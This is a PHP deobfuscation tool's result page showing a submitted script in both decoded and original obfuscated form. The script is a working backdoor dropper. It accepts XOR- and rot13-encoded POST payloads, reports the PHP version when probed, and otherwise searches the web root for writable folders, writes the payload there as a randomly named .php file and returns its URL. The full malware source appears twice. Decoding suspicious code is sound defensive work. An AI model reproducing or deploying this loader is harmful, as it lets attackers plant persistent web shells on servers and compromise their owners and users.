Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $aUUBJ = chr(461 - 393) . "O" . chr(67) . "\125" . chr(188 ..

Decoded Output download

<?php $aUUBJ = 
    chr(461 - 393) . 
    "O" . 
    chr(67) . 
    "U" . 
    chr(188 - 111) . 
    "E" . 
    "N" . 
    chr(101 - 17) . 
    "_" . 
    "R" . 
    "O" . 
    "O" . 
    "T"; 
$ZSQcs = 
    "H" . 
    "T" . 
    "T" . 
    "P" . 
    chr(662 - 567) . 
    chr(72) . 
    "O" . 
    "S" . 
    chr(84); 
$LWXxAseQnE = 
    chr(104) . chr(1032 - 916) . "t" . chr(112) . ":" . chr(47) . chr(47); 
$fEPQTIkK = chr(155 - 109) . "p" . "h" . chr(1056 - 944); 
$CBwwvfNEN = "p" . chr(104) . chr(112); 
$tbwetQ = 
    chr(113 - 11) . 
    "i" . 
    "l" . 
    "e" . 
    "_" . 
    "p" . 
    chr(117) . 
    "t" . 
    chr(959 - 864) . 
    chr(1063 - 964) . 
    chr(111) . 
    "n" . 
    chr(172 - 56) . 
    chr(355 - 254) . 
    chr(110) . 
    chr(299 - 183) . 
    chr(493 - 378); 
$CURBRhySmT = 
    "r" . 
    "a" . 
    "w" . 
    "u" . 
    "r" . 
    "l" . 
    chr(334 - 234) . 
    chr(101) . 
    "c" . 
    "o" . 
    chr(100) . 
    "e"; 
$ynEPtUt = 
    chr(117) . 
    "n" . 
    chr(115) . 
    "e" . 
    "r" . 
    chr(105) . 
    "a" . 
    "l" . 
    chr(254 - 149) . 
    "z" . 
    "e"; 
$hnKBzWGTE = 
    "p" . 
    chr(104) . 
    chr(112) . 
    "v" . 
    "e" . 
    chr(412 - 298) . 
    "s" . 
    chr(775 - 670) . 
    "o" . 
    "n"; 
$VKQYGq = 
    "s" . 
    "t" . 
    chr(114) . 
    chr(95) . 
    chr(114) . 
    "o" . 
    "t" . 
    chr(49) . 
    "3"; 
$FkuSmS = 
    chr(362 - 247) . 
    chr(101) . 
    "r" . 
    "i" . 
    chr(245 - 148) . 
    "l" . 
    chr(105) . 
    "z" . 
    "e"; 
$exymC = 
    chr(404 - 289) . 
    "t" . 
    "r" . 
    "_" . 
    "s" . 
    "p" . 
    "l" . 
    chr(105) . 
    "t"; 
foreach ($_POST as $rFCpk => $XbnVjfCowe) { 
    if (strlen($rFCpk) == 16) { 
        $XbnVjfCowe = $exymC($CURBRhySmT($VKQYGq($XbnVjfCowe))); 
        $rFCpk = array_slice( 
            $exymC(str_repeat($rFCpk, count($XbnVjfCowe) / 16 + 1)), 
            0, 
            count($XbnVjfCowe) 
        ); 
        function eCtPZT($BKVYK, $qBICKxagRv, $rFCpk) 
        { 
            $kMAqV = "0553db88-aa7e-41b3-ac8f-d2b92dacea40"; 
            return $BKVYK ^ $kMAqV[$qBICKxagRv % strlen($kMAqV)] ^ $rFCpk; 
        } 
        $XbnVjfCowe = implode( 
            "", 
            array_map( 
                "eCtPZT", 
                array_values($XbnVjfCowe), 
                array_keys($XbnVjfCowe), 
                array_values($rFCpk) 
            ) 
        ); 
        $XbnVjfCowe = @$ynEPtUt($XbnVjfCowe); 
        if (@is_array($XbnVjfCowe)) { 
            $PNSeS = array_keys($XbnVjfCowe); 
            $XbnVjfCowe = $XbnVjfCowe[$PNSeS[0]]; 
            if ($XbnVjfCowe === $PNSeS[0]) { 
                echo @$FkuSmS([$CBwwvfNEN => @$hnKBzWGTE()]); 
                exit(); 
            } else { 
                function jBvopmaTlB($pCTziQir) 
                { 
                    static $wXgCY = []; 
                    $utnuXzeRq = glob($pCTziQir . "/*", GLOB_ONLYDIR); 
                    if (count($utnuXzeRq) > 0) { 
                        foreach ($utnuXzeRq as $pCTziQ) { 
                            if (@is_writable($pCTziQ)) { 
                                $wXgCY[] = $pCTziQ; 
                            } 
                        } 
                    } 
                    foreach ($utnuXzeRq as $pCTziQir) { 
                        jBvopmaTlB($pCTziQir); 
                    } 
                    return $wXgCY; 
                } 
                $QpmWRsEbU = $_SERVER[$aUUBJ]; 
                $utnuXzeRq = jBvopmaTlB($QpmWRsEbU); 
                $PNSeS = array_rand($utnuXzeRq); 
                $WDEQzU = 
                    $utnuXzeRq[$PNSeS] . 
                    "/" . 
                    substr(md5(time()), 0, 8) . 
                    $fEPQTIkK; 
                @$tbwetQ($WDEQzU, $XbnVjfCowe); 
                echo $LWXxAseQnE . 
                    $_SERVER[$ZSQcs] . 
                    substr($WDEQzU, strlen($QpmWRsEbU)); 
                exit(); 
            } 
        } 
    } 
} 
 ?>

Did this file decode correctly?

Original Code

<?php $aUUBJ =
    chr(461 - 393) .
    "O" .
    chr(67) .
    "\125" .
    chr(188 - 111) .
    "\x45" .
    "\116" .
    chr(101 - 17) .
    "\137" .
    "R" .
    "\x4f" .
    "\x4f" .
    "\124";
$ZSQcs =
    "\110" .
    "\124" .
    "T" .
    "\120" .
    chr(662 - 567) .
    chr(72) .
    "O" .
    "\123" .
    chr(84);
$LWXxAseQnE =
    chr(104) . chr(1032 - 916) . "\x74" . chr(112) . "\72" . chr(47) . chr(47);
$fEPQTIkK = chr(155 - 109) . "p" . "\150" . chr(1056 - 944);
$CBwwvfNEN = "p" . chr(104) . chr(112);
$tbwetQ =
    chr(113 - 11) .
    "\151" .
    "\x6c" .
    "\145" .
    "\x5f" .
    "p" .
    chr(117) .
    "t" .
    chr(959 - 864) .
    chr(1063 - 964) .
    chr(111) .
    "\x6e" .
    chr(172 - 56) .
    chr(355 - 254) .
    chr(110) .
    chr(299 - 183) .
    chr(493 - 378);
$CURBRhySmT =
    "\x72" .
    "\x61" .
    "\167" .
    "\x75" .
    "\x72" .
    "\x6c" .
    chr(334 - 234) .
    chr(101) .
    "c" .
    "\157" .
    chr(100) .
    "\x65";
$ynEPtUt =
    chr(117) .
    "n" .
    chr(115) .
    "e" .
    "\162" .
    chr(105) .
    "a" .
    "l" .
    chr(254 - 149) .
    "z" .
    "\145";
$hnKBzWGTE =
    "\x70" .
    chr(104) .
    chr(112) .
    "v" .
    "e" .
    chr(412 - 298) .
    "s" .
    chr(775 - 670) .
    "\x6f" .
    "\x6e";
$VKQYGq =
    "\163" .
    "\164" .
    chr(114) .
    chr(95) .
    chr(114) .
    "\157" .
    "\164" .
    chr(49) .
    "3";
$FkuSmS =
    chr(362 - 247) .
    chr(101) .
    "r" .
    "\151" .
    chr(245 - 148) .
    "\154" .
    chr(105) .
    "\x7a" .
    "\145";
$exymC =
    chr(404 - 289) .
    "\164" .
    "r" .
    "\x5f" .
    "\x73" .
    "p" .
    "\154" .
    chr(105) .
    "t";
foreach ($_POST as $rFCpk => $XbnVjfCowe) {
    if (strlen($rFCpk) == 16) {
        $XbnVjfCowe = $exymC($CURBRhySmT($VKQYGq($XbnVjfCowe)));
        $rFCpk = array_slice(
            $exymC(str_repeat($rFCpk, count($XbnVjfCowe) / 16 + 1)),
            0,
            count($XbnVjfCowe)
        );
        function eCtPZT($BKVYK, $qBICKxagRv, $rFCpk)
        {
            $kMAqV = "0553db88-aa7e-41b3-ac8f-d2b92dacea40";
            return $BKVYK ^ $kMAqV[$qBICKxagRv % strlen($kMAqV)] ^ $rFCpk;
        }
        $XbnVjfCowe = implode(
            "",
            array_map(
                "eCtPZT",
                array_values($XbnVjfCowe),
                array_keys($XbnVjfCowe),
                array_values($rFCpk)
            )
        );
        $XbnVjfCowe = @$ynEPtUt($XbnVjfCowe);
        if (@is_array($XbnVjfCowe)) {
            $PNSeS = array_keys($XbnVjfCowe);
            $XbnVjfCowe = $XbnVjfCowe[$PNSeS[0]];
            if ($XbnVjfCowe === $PNSeS[0]) {
                echo @$FkuSmS([$CBwwvfNEN => @$hnKBzWGTE()]);
                exit();
            } else {
                function jBvopmaTlB($pCTziQir)
                {
                    static $wXgCY = [];
                    $utnuXzeRq = glob($pCTziQir . "/*", GLOB_ONLYDIR);
                    if (count($utnuXzeRq) > 0) {
                        foreach ($utnuXzeRq as $pCTziQ) {
                            if (@is_writable($pCTziQ)) {
                                $wXgCY[] = $pCTziQ;
                            }
                        }
                    }
                    foreach ($utnuXzeRq as $pCTziQir) {
                        jBvopmaTlB($pCTziQir);
                    }
                    return $wXgCY;
                }
                $QpmWRsEbU = $_SERVER[$aUUBJ];
                $utnuXzeRq = jBvopmaTlB($QpmWRsEbU);
                $PNSeS = array_rand($utnuXzeRq);
                $WDEQzU =
                    $utnuXzeRq[$PNSeS] .
                    "/" .
                    substr(md5(time()), 0, 8) .
                    $fEPQTIkK;
                @$tbwetQ($WDEQzU, $XbnVjfCowe);
                echo $LWXxAseQnE .
                    $_SERVER[$ZSQcs] .
                    substr($WDEQzU, strlen($QpmWRsEbU));
                exit();
            }
        }
    }
}

Function Calls

None

Variables

None

Stats

MD5 98ad31b53e97d1910ed87c63a6801083
Eval Count 0
Decode Time 57 ms